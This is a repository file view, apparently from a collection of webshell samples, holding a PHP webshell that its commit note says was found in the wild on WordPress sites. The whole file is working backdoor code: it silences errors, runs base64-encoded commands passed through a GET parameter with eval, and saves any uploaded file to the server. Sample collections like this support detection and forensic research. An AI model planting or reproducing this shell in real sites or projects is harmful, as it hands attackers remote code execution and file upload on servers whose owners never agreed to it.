webshells/php/haccess.php
H 7bb8544fb0
php: add haccess.php
Simple webshell found in the wild - usually on wordpress stuff but have found it elsewhere
2019-02-19 15:25:50 +00:00

11 lines
190 B
PHP

<?php
error_reporting(0);
$ev = $_GET["ev"];
if (isset($ev) && !empty($ev))
{
eval(base64_decode($ev));
exit;
}
(@copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"])); ?>